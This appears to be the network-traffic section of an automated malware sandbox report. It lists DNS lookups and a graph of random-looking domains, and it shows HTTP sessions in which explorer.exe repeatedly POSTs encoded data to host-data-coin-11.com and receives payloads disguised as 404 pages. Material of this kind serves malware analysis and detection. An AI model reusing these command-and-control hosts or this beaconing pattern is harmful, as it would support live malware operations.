Dec 1, 2021 09:14:12.558250904 CET	8.8.8.8	192.168.2.4	0xc7b8	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:12.752151012 CET	8.8.8.8	192.168.2.4	0xf8d1	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:12.940529108 CET	8.8.8.8	192.168.2.4	0xcb7	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:13.212126017 CET	8.8.8.8	192.168.2.4	0x17fb	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:13.746201038 CET	8.8.8.8	192.168.2.4	0x7729	No error (0)	privacytoolzforyou-7000.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:16.803610086 CET	8.8.8.8	192.168.2.4	0x79d6	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.041070938 CET	8.8.8.8	192.168.2.4	0x5b4	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.547084093 CET	8.8.8.8	192.168.2.4	0xa2fc	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:17.829583883 CET	8.8.8.8	192.168.2.4	0xf396	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.087007999 CET	8.8.8.8	192.168.2.4	0xe60d	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.266704082 CET	8.8.8.8	192.168.2.4	0xefba	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:18.823520899 CET	8.8.8.8	192.168.2.4	0x8b16	No error (0)	host-file-host-3.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:19.821194887 CET	8.8.8.8	192.168.2.4	0xca4b	No error (0)	file-file-host4.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.432487965 CET	8.8.8.8	192.168.2.4	0x9ce9	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.621478081 CET	8.8.8.8	192.168.2.4	0x83ac	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:26.878792048 CET	8.8.8.8	192.168.2.4	0x1eb9	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.087215900 CET	8.8.8.8	192.168.2.4	0x5e3c	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.370862007 CET	8.8.8.8	192.168.2.4	0x94ce	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.572081089 CET	8.8.8.8	192.168.2.4	0xdf6b	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:27.848443031 CET	8.8.8.8	192.168.2.4	0x2089	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:28.076781034 CET	8.8.8.8	192.168.2.4	0xb273	No error (0)	host-file-host-3.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.424825907 CET	8.8.8.8	192.168.2.4	0x6232	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.704303980 CET	8.8.8.8	192.168.2.4	0xad1f	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:32.957524061 CET	8.8.8.8	192.168.2.4	0xb0c8	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.167165041 CET	8.8.8.8	192.168.2.4	0xd15c	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.356935978 CET	8.8.8.8	192.168.2.4	0xd2fe	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:33.848562956 CET	8.8.8.8	192.168.2.4	0x336b	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.053011894 CET	8.8.8.8	192.168.2.4	0xc2c5	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.246054888 CET	8.8.8.8	192.168.2.4	0x3bfc	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.494960070 CET	8.8.8.8	192.168.2.4	0x6f04	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.686779022 CET	8.8.8.8	192.168.2.4	0x4d5f	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:14:34.874905109 CET	8.8.8.8	192.168.2.4	0xd304	No error (0)	host-data-coin-11.com		95.213.165.249	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.740073919 CET	8.8.8.8	192.168.2.4	0xd1c4	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.740073919 CET	8.8.8.8	192.168.2.4	0xd1c4	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.740073919 CET	8.8.8.8	192.168.2.4	0xd1c4	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.740073919 CET	8.8.8.8	192.168.2.4	0xd1c4	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:22.740073919 CET	8.8.8.8	192.168.2.4	0xd1c4	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:28.607682943 CET	8.8.8.8	192.168.2.4	0xbb3	No error (0)	qo.ckauni.ru		81.177.141.85	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:32.448966980 CET	8.8.8.8	192.168.2.4	0x1e35	No error (0)	www.google.com		142.250.184.68	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:34.920037985 CET	8.8.8.8	192.168.2.4	0xe8e8	Name error (3)	unic7m.top	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:38.836749077 CET	8.8.8.8	192.168.2.4	0xe102	Name error (3)	unic7m.top	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:42.855458975 CET	8.8.8.8	192.168.2.4	0xe293	Name error (3)	unic7m.top	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 09:15:46.783274889 CET	8.8.8.8	192.168.2.4	0xdee9	Name error (3)	unic7m.top	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

nbriredl.org

host-data-coin-11.com

gqnrsjcd.org

sqdlx.net

ggigae.com

xbbffefnf.net

fhfscvxar.com

host-file-host-3.com

byrobmm.com

xerwbpt.net

xbopjw.org

jucecaeyqu.com

nakeeqwaft.com

pjndoeiyl.org

hmyqurtmv.net

yxndp.net

luuqcbcy.org

pxptimk.com

smfbsrgxse.org

nabmhhv.net

mdyfwsxro.com

kpgguo.net

tevvfr.com

aryonwruu.com

vefoyiify.org

guokyvqq.net

sdcdogt.org

vfrmk.net

tgtmtdosym.net

privacytoolzforyou-7000.com

drrwv.net

rbuyqamdy.net

omxkjxm.net

xigvfc.com

nwqlosscc.net

bkjjovqxmd.org

file-file-host4.com

pborgy.net

hqppgl.org

ybcka.net

buintdmfv.com

slymqhed.org

oamtqaba.net

xuobblxeto.org

clekn.com

jhglqm.org

pnkfchg.org

inflqn.com

obtnplqgwg.com

buxkshswe.org

wjpbjeendw.net

pmhitsi.org

jydujxmpvv.com

xtfcaknrkq.com

mtfpb.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49767	162.159.130.233	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49832	162.159.130.233	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49765	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:00.647543907 CET	2433	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xerwbpt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 252 Host: host-data-coin-11.com
Dec 1, 2021 09:14:00.754903078 CET	2434	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49766	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:00.844767094 CET	2435	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbopjw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 112 Host: host-data-coin-11.com
Dec 1, 2021 09:14:00.950323105 CET	2435	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 36 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 50 dd 4b d0 fe 26 85 21 ea a5 90 50 2e e2 be 4d 23 e3 b3 b4 6c fb 9f bc 50 ab 73 93 cb 32 40 5c 3c 0d 4b dd bb 4a be ff 57 99 bd d4 0b 8d 2b 80 cf 0d 0a 30 0d 0a 0d 0a Data Ascii: 65I:82OB%,YR("XPK&!P.M#lPs2@\<KJW+0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49768	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:02.523145914 CET	2846	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jucecaeyqu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: host-data-coin-11.com
Dec 1, 2021 09:14:02.620583057 CET	2847	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49769	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:02.711354017 CET	2848	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nakeeqwaft.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: host-data-coin-11.com
Dec 1, 2021 09:14:02.810172081 CET	2849	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49770	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:03.292432070 CET	2850	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pjndoeiyl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 288 Host: host-data-coin-11.com
Dec 1, 2021 09:14:03.394383907 CET	2851	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49771	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:03.563349962 CET	2852	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hmyqurtmv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 254 Host: host-data-coin-11.com
Dec 1, 2021 09:14:03.664793015 CET	2853	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49772	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:03.800296068 CET	2854	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yxndp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 110 Host: host-data-coin-11.com
Dec 1, 2021 09:14:03.903609991 CET	2854	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:03 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49773	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:04.442909002 CET	2855	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://luuqcbcy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 177 Host: host-data-coin-11.com
Dec 1, 2021 09:14:04.543385029 CET	2856	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:04 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49774	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
